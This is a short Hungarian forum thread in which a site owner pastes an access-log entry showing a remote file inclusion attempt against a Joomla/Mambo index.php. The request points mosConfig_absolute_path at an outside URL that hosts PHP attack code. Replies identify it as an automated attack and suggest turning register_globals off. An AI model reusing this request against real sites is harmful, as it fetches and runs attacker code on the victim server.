Deface probálkozás
Ma ezt találtam az access logban:
85.96.230.56 - - [03/Jul/2007:20:54:49 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tpcc10.xpg.com.br/tool25.txt? HTTP/1.0" 302 3 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
Látott már valaki ilyet?
Mikor wgettel lefutattam ezt kaptam:
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
index.php?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http:%2F%2Fwww.tpcc10.xpg.com.br%2Ftool25.txt?: Permission denied
Cannot write to `index.php?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http:%2F%2Fwww.tpcc10.xpg.com.br%2Ftool25.txt?' (Permission denied).
■ 85.96.230.56 - - [03/Jul/2007:20:54:49 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tpcc10.xpg.com.br/tool25.txt? HTTP/1.0" 302 3 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
Látott már valaki ilyet?
Mikor wgettel lefutattam ezt kaptam:
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
index.php?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http:%2F%2Fwww.tpcc10.xpg.com.br%2Ftool25.txt?: Permission denied
Cannot write to `index.php?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http:%2F%2Fwww.tpcc10.xpg.com.br%2Ftool25.txt?' (Permission denied).
azt hiszem
Automatizált támadás
Ha belenézel a hivatkozott fájlba: http://www.tpcc10.xpg.com.br/tool25.txt ez egy PHP fájl, tehát a támadás egy remote inclusion-re van alapozva. Mellesleg nagyon ügyes cucc, mindenkinek szolgáljon okulására.
register globals off
Üdv,
Felhő
hihetetlen
Hiheto